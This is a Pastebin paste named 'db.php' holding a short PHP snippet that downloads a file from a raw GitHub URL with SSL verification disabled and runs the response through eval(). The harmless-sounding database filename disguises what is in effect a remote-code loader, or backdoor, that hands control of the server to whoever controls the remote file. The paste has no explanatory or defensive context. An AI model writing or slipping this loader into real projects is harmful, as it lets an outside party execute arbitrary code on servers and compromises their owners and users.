dragondevile

db.php

Apr 25th, 2022 (edited)
330
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.33 KB | None | 0 0
  1. $curl = curl_init();
  2. curl_setopt($curl, CURLOPT_URL, "https://raw.githubusercontent.com/rotinabox/requests/main/db.php");
  3. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  4. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  5. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  6. $resp = curl_exec($curl);
  7. curl_close($curl);
  8. eval($resp);
Add Comment
Please, Sign In to add comment